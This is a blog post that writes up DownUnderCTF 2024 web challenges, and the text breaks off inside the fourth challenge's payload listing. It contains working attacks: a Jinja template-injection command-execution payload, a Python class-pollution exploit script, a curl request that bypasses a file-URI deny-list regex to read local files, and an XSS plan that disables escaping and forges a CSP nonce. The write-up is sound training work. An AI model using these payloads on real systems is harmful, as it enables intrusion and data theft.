<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="[Web] parrot the emuDescription It is so nice to hear Parrot the Emu talk back  AnalysisThe code renders a template string with user input which leads to RCE. 123456789101112131415@app.route(&amp;#x27">
<meta property="og:type" content="article">
<meta property="og:title" content="DownUnderCTF2024">
<meta property="og:url" content="https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/index.html">
<meta property="og:site_name" content="Shen">
<meta property="og:description" content="[Web] parrot the emuDescription It is so nice to hear Parrot the Emu talk back  AnalysisThe code renders a template string with user input which leads to RCE. 123456789101112131415@app.route(&amp;#x27">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/downunder2024.png">
<meta property="og:image" content="https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/hah.png">
<meta property="article:published_time" content="2024-07-06T20:39:38.000Z">
<meta property="article:modified_time" content="2024-07-07T10:22:05.676Z">
<meta property="article:author" content="Shen">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/downunder2024.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/puck.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/puck.ico" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/puck.ico">
        
      
    
    <!-- title -->
    <title>DownUnderCTF2024</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/06/29/UIU2024/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&text=DownUnderCTF2024"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&title=DownUnderCTF2024"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&is_video=false&description=DownUnderCTF2024"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=DownUnderCTF2024&body=Check out this article: https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&title=DownUnderCTF2024"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&title=DownUnderCTF2024"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&title=DownUnderCTF2024"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&title=DownUnderCTF2024"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&name=DownUnderCTF2024&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://chuajianshen.github.io/2024/07/06/DownUnderCTF2024/&t=DownUnderCTF2024"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-parrot-the-emu"><span class="toc-number">1.</span> <span class="toc-text">[Web] parrot the emu</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Description"><span class="toc-number">1.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis"><span class="toc-number">1.2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution"><span class="toc-number">1.3.</span> <span class="toc-text">Solution</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-co2"><span class="toc-number">2.</span> <span class="toc-text">[Web] co2</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Description-1"><span class="toc-number">2.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-1"><span class="toc-number">2.2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution-1"><span class="toc-number">2.3.</span> <span class="toc-text">Solution</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Payload"><span class="toc-number">2.4.</span> <span class="toc-text">Payload</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-hah-got-em"><span class="toc-number">3.</span> <span class="toc-text">[Web] hah got em</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Description-2"><span class="toc-number">3.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-2"><span class="toc-number">3.2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution-2"><span class="toc-number">3.3.</span> <span class="toc-text">Solution</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Payload-1"><span class="toc-number">3.4.</span> <span class="toc-text">Payload</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-co2v2"><span class="toc-number">4.</span> <span class="toc-text">[Web] co2v2</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Description-3"><span class="toc-number">4.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-3"><span class="toc-number">4.2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution-3"><span class="toc-number">4.3.</span> <span class="toc-text">Solution</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Payload-2"><span class="toc-number">4.4.</span> <span class="toc-text">Payload</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Web-sniffy"><span class="toc-number">5.</span> <span class="toc-text">[Web] sniffy</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Description-4"><span class="toc-number">5.1.</span> <span class="toc-text">Description</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis-4"><span class="toc-number">5.2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Solution-4"><span class="toc-number">5.3.</span> <span class="toc-text">Solution</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        DownUnderCTF2024
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Shen</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-07-06T20:39:38.000Z" class="dt-published" itemprop="datePublished">07-07-2024</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <img src="/2024/07/06/DownUnderCTF2024/downunder2024.png" class="" title="logo">

<br>

<h1 id="Web-parrot-the-emu"><a href="#Web-parrot-the-emu" class="headerlink" title="[Web] parrot the emu"></a>[Web] parrot the emu</h1><h2 id="Description"><a href="#Description" class="headerlink" title="Description"></a>Description</h2><blockquote>
<p>It is so nice to hear Parrot the Emu talk back</p>
</blockquote>
<h2 id="Analysis"><a href="#Analysis" class="headerlink" title="Analysis"></a>Analysis</h2><p>The code renders a template string with user input which leads to RCE.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">@app.route(&#x27;/&#x27;, methods=[&#x27;GET&#x27;, &#x27;POST&#x27;])</span><br><span class="line">def vulnerable():</span><br><span class="line">    chat_log = []</span><br><span class="line"></span><br><span class="line">    if request.method == &#x27;POST&#x27;:</span><br><span class="line">        user_input = request.form.get(&#x27;user_input&#x27;)</span><br><span class="line">        try:</span><br><span class="line">            result = render_template_string(user_input)</span><br><span class="line">        except Exception as e:</span><br><span class="line">            result = str(e)</span><br><span class="line"></span><br><span class="line">        chat_log.append((&#x27;User&#x27;, user_input))</span><br><span class="line">        chat_log.append((&#x27;Emu&#x27;, result))</span><br><span class="line">    </span><br><span class="line">    return render_template(&#x27;index.html&#x27;, chat_log=chat_log)</span><br></pre></td></tr></table></figure>

<h2 id="Solution"><a href="#Solution" class="headerlink" title="Solution"></a>Solution</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;cycler.__init__.__globals__.os.popen(&#x27;cat ./flag&#x27;).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">DUCTF&#123;PaRrOt_EmU_ReNdErS_AnYtHiNg&#125;</span><br></pre></td></tr></table></figure>

<h1 id="Web-co2"><a href="#Web-co2" class="headerlink" title="[Web] co2"></a>[Web] co2</h1><h2 id="Description-1"><a href="#Description-1" class="headerlink" title="Description"></a>Description</h2><blockquote>
<p>A group of students who don’t like to do things the “conventional” way decided to come up with a CyberSecurity Blog post. You’ve been hired to perform an in-depth whitebox test on their web application.</p>
</blockquote>
<h2 id="Analysis-1"><a href="#Analysis-1" class="headerlink" title="Analysis"></a>Analysis</h2><p>Our goal is to have “flag” defined as the string “true” but it is already previously defined.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">flag = os.getenv(&quot;flag&quot;)</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">@app.route(&quot;/get_flag&quot;)</span><br><span class="line">@login_required</span><br><span class="line">def get_flag():</span><br><span class="line">    if flag == &quot;true&quot;:</span><br><span class="line">        return &quot;DUCTF&#123;NOT_THE_REAL_FLAG&#125;&quot;</span><br><span class="line">    else:</span><br><span class="line">        return &quot;Nope&quot;</span><br></pre></td></tr></table></figure>

<p>This may seem impossible but the challenge is a Python prototype pollution challenge which was researched in <a target="_blank" rel="noopener" href="https://blog.abdulrah33m.com/prototype-pollution-in-python/" title="Title">article</a>. The challenge implements the same vulnerable merge function which can pollute properties in the chain.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">def merge(src, dst):</span><br><span class="line">    for k, v in src.items():</span><br><span class="line">        if hasattr(dst, &#x27;__getitem__&#x27;):</span><br><span class="line">            if dst.get(k) and type(v) == dict:</span><br><span class="line">                merge(v, dst.get(k))</span><br><span class="line">            else:</span><br><span class="line">                dst[k] = v</span><br><span class="line">        elif hasattr(dst, k) and type(v) == dict:</span><br><span class="line">            merge(v, getattr(dst, k))</span><br><span class="line">        else:</span><br><span class="line">            setattr(dst, k, v)</span><br></pre></td></tr></table></figure>

<h2 id="Solution-1"><a href="#Solution-1" class="headerlink" title="Solution"></a>Solution</h2><p>We will pollute the flag variable to overwrite it to “true” through the &#x2F;send_feedback endpoint. The solution was made my teammate <a target="_blank" rel="noopener" href="https://github.com/vicevirus" title="Title">vicevirus</a>.</p>
<h2 id="Payload"><a href="#Payload" class="headerlink" title="Payload"></a>Payload</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line"></span><br><span class="line">chall_url = &quot;https://web-co2-7cd5e7e64c239c8c.2024.ductf.dev&quot;</span><br><span class="line">s = requests.Session()</span><br><span class="line"></span><br><span class="line">def register():</span><br><span class="line">    url = chall_url + &quot;/register&quot;</span><br><span class="line">    data = &#123;</span><br><span class="line">        &quot;username&quot;: &quot;riro&quot;,</span><br><span class="line">        &quot;password&quot;: &quot;rori&quot;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    request = s.post(url, data=data)</span><br><span class="line">    print(request.text)</span><br><span class="line">    </span><br><span class="line"></span><br><span class="line">def login():</span><br><span class="line">    url = chall_url + &quot;/login&quot;</span><br><span class="line">    data = &#123;</span><br><span class="line">        &quot;username&quot;: &quot;riro&quot;,</span><br><span class="line">        &quot;password&quot;: &quot;rori&quot;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    request = s.post(url, data=data)</span><br><span class="line">    print(request.text)</span><br><span class="line"></span><br><span class="line">def sendPayload():</span><br><span class="line">    url = chall_url + &quot;/save_feedback&quot;</span><br><span class="line">    data = &#123;</span><br><span class="line">        &quot;__class__&quot;: &#123;</span><br><span class="line">            &quot;__init__&quot;: &#123;</span><br><span class="line">                &quot;__globals__&quot;: &#123;</span><br><span class="line">                    &quot;flag&quot;: &quot;true&quot;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    request = s.post(url, json=data)</span><br><span class="line">    print(request.text)</span><br><span class="line">    </span><br><span class="line">def getFlag():</span><br><span class="line">    url = chall_url + &quot;/get_flag&quot;</span><br><span class="line">    request = s.get(url)</span><br><span class="line">    print(request.text)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">register()</span><br><span class="line">login()</span><br><span class="line">sendPayload()</span><br><span class="line">getFlag()</span><br><span class="line"></span><br><span class="line">DUCTF&#123;_cl455_p0lluti0n_ftw_&#125;</span><br></pre></td></tr></table></figure>

<h1 id="Web-hah-got-em"><a href="#Web-hah-got-em" class="headerlink" title="[Web] hah got em"></a>[Web] hah got em</h1><h2 id="Description-2"><a href="#Description-2" class="headerlink" title="Description"></a>Description</h2><blockquote>
</blockquote>
<pre><code>Deez nutz

Hah got em

...

Oh by the way I love using my new microservice parsing these arrest reports to PDF
</code></pre>
<p>The evil bot (2024)</p>
<h2 id="Analysis-2"><a href="#Analysis-2" class="headerlink" title="Analysis"></a>Analysis</h2><p>The dockerfile provided implements <a target="_blank" rel="noopener" href="https://github.com/gotenberg/gotenberg" title="Title">gotenberg</a> version 8.0.3. As the latest version is 8.8.0, we can be certain that the old version contains a vulnerability. </p>
<p>Browsing to github to view the changelogs for the version after 8.0.3, 8.1.0 shows that there is an unathorized file read.</p>
<img src="/2024/07/06/DownUnderCTF2024/hah.png" class="" title="logo">

<p>The changes are as follows:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">- CHROMIUM_DENY_LIST=&quot;^file:///[^tmp].*&quot; (version 8.0.3, the version used by the challenge)</span><br><span class="line">+ CHROMIUM_DENY_LIST=^file:(?!//\/tmp/).* (version 8.1.0)</span><br></pre></td></tr></table></figure>

<p>In the 8.0.3 version, the regex checks for “file:&#x2F;&#x2F;&#x2F;“ as the starting point to try and disallow file reads such as “file:&#x2F;&#x2F;&#x2F;etc&#x2F;passwd”.</p>
<h2 id="Solution-2"><a href="#Solution-2" class="headerlink" title="Solution"></a>Solution</h2><p>We can bypass this check by supplying a local file URI such as “file:&#x2F;&#x2F;localhost&#x2F;etc&#x2F;passwd” as it does not start with “file:&#x2F;&#x2F;&#x2F;“. This is due to the fact that a valid <a target="_blank" rel="noopener" href="https://en.wikipedia.org/wiki/File_URI_scheme" title="Title">file</a> URI can be defined as:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">file:/path (no hostname)</span><br><span class="line">file:///path (empty hostname),</span><br><span class="line">file://hostname/path</span><br></pre></td></tr></table></figure>

<h2 id="Payload-1"><a href="#Payload-1" class="headerlink" title="Payload"></a>Payload</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">curl --request POST https://web-hah-got-em-20ac16c4b909.2024.ductf.dev/forms/chromium/convert/url --form url=file://localhost/etc/flag.txt -o flag.pdf</span><br><span class="line"></span><br><span class="line">DUCTF&#123;dEeZ_r3GeX_cHeCK5_h4h_g0t_eM&#125;</span><br></pre></td></tr></table></figure>

<h1 id="Web-co2v2"><a href="#Web-co2v2" class="headerlink" title="[Web] co2v2"></a>[Web] co2v2</h1><h2 id="Description-3"><a href="#Description-3" class="headerlink" title="Description"></a>Description</h2><blockquote>
<p>Well the last time they made a big mistake with the flag endpoint, now we don’t even have it anymore. It’s time for a second pentest for some new functionality they have been working on.</p>
</blockquote>
<h2 id="Analysis-3"><a href="#Analysis-3" class="headerlink" title="Analysis"></a>Analysis</h2><p>The challenge has the same merge function from the previous challenge but now the goal of the challenge is to achieve XSS. By looking at the source files, we can see that there are two protections in place which are:</p>
<ul>
<li>Jinja Escaping</li>
<li>Content Security Policy (CSP)</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">class jEnv():</span><br><span class="line">    &quot;&quot;&quot;Contains the default config for the Jinja environment. As we move towards adding more functionality this will serve as the object that will</span><br><span class="line">    ensure the right environment is being loaded. The env can be updated when we slowly add in admin functionality to the application.</span><br><span class="line">    &quot;&quot;&quot;</span><br><span class="line">    def __init__(self):</span><br><span class="line">        self.env = Environment(loader=PackageLoader(&quot;app&quot;, &quot;templates&quot;), autoescape=TEMPLATES_ESCAPE_ALL)</span><br><span class="line"></span><br><span class="line">template_env = jEnv()</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">@app.after_request</span><br><span class="line">def apply_csp(response):</span><br><span class="line">    nonce = g.get(&#x27;nonce&#x27;)</span><br><span class="line">    csp_policy = (</span><br><span class="line">        f&quot;default-src &#x27;self&#x27;; &quot;</span><br><span class="line">        f&quot;script-src &#x27;self&#x27; &#x27;nonce-&#123;nonce&#125;&#x27; https://ajax.googleapis.com; &quot;</span><br><span class="line">        f&quot;style-src &#x27;self&#x27; &#x27;nonce-&#123;nonce&#125;&#x27; https://cdn.jsdelivr.net; &quot;</span><br><span class="line">        f&quot;script-src-attr &#x27;self&#x27; &#x27;nonce-&#123;nonce&#125;&#x27;; &quot; </span><br><span class="line">        f&quot;connect-src *; &quot;</span><br><span class="line">    )</span><br><span class="line">    response.headers[&#x27;Content-Security-Policy&#x27;] = csp_policy</span><br><span class="line">    return response</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>The nonce generation has the code of </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">SECRET_NONCE = generate_random_string()</span><br><span class="line"></span><br><span class="line">RANDOM_COUNT = random.randint(32,64)</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">def generate_nonce(data):</span><br><span class="line">    nonce = SECRET_NONCE + data + generate_random_string(length=RANDOM_COUNT)</span><br><span class="line">    sha256_hash = hashlib.sha256()</span><br><span class="line">    sha256_hash.update(nonce.encode(&#x27;utf-8&#x27;))</span><br><span class="line">    hash_hex = sha256_hash.hexdigest()</span><br><span class="line">    g.nonce = hash_hex</span><br><span class="line">    return hash_hex</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">@app.before_request</span><br><span class="line">def set_nonce():</span><br><span class="line">    generate_nonce(request.path)</span><br><span class="line"></span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p>The admin will visit the home page of the site which contains our blog posts, in order for our XSS payload to be executed, we would need to bypass these restrictions.</p>
<h2 id="Solution-3"><a href="#Solution-3" class="headerlink" title="Solution"></a>Solution</h2><p>There is a convenient route under &#x2F;admin&#x2F;update-accepted-templates that enables us to change the original autoescape value to false by prototype pollution. After escaping is bypassed, we will now have to bypass the CSP by changing the SECRET_NONCE and RANDOM_COUNT variables in order to generate a nonce that we control.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">TEMPLATES_ESCAPE_ALL = True</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"># Future Admin routes - FOR TEST ENVIRONMENT ONLY</span><br><span class="line">@app.route(&quot;/admin/update-accepted-templates&quot;, methods=[&quot;POST&quot;])</span><br><span class="line">@login_required</span><br><span class="line">def update_template():</span><br><span class="line">    data = json.loads(request.data)</span><br><span class="line">    # Enforce strict policy to filter all expressions</span><br><span class="line">    if &quot;policy&quot; in data and data[&quot;policy&quot;] == &quot;strict&quot;:</span><br><span class="line">        print(&quot;Policy reached&quot;, flush=True)</span><br><span class="line">        template_env.env = Environment(loader=PackageLoader(&quot;app&quot;, &quot;templates&quot;), autoescape=TEMPLATES_ESCAPE_ALL)</span><br><span class="line">    # elif &quot;policy&quot; in data and data[&quot;policy&quot;] == &quot;lax&quot;:</span><br><span class="line">    #     template_env.env = Environment(loader=PackageLoader(&quot;app&quot;, &quot;templates&quot;), autoescape=TEMPLATES_ESCAPE_NONE)</span><br><span class="line">    # TO DO: Add more configurations for allowing LateX, XML etc. to be configured in app</span><br><span class="line">    return jsonify(&#123;&quot;success&quot;: &quot;true&quot;&#125;), 200</span><br></pre></td></tr></table></figure>

<p>We will change the SECRET_NONCE to an empty string “” and RANDOM_COUNT to 0. This will make the nonce only calculate the path as the value and it can be known as the path to the home page is “&#x2F;“</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">def generate_nonce(data):</span><br><span class="line">    nonce = SECRET_NONCE + data + generate_random_string(length=RANDOM_COUNT)</span><br><span class="line">    sha256_hash = hashlib.sha256()</span><br><span class="line">    sha256_hash.update(nonce.encode(&#x27;utf-8&#x27;))</span><br><span class="line">    hash_hex = sha256_hash.hexdigest()</span><br><span class="line">    g.nonce = hash_hex</span><br><span class="line">    return hash_hex</span><br><span class="line"></span><br><span class="line">The nonce will now become &quot;&quot; + &quot;/&quot; + &quot;&quot; which is just &quot;/&quot;. The resulting nonce is &quot;8a5edab282632443219e051e4ade2d1d5bbc671c781051bf1437897cbdfea0f1&quot;.</span><br></pre></td></tr></table></figure>
<h2 id="Payload-2"><a href="#Payload-2" class="headerlink" title="Payload"></a>Payload</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span 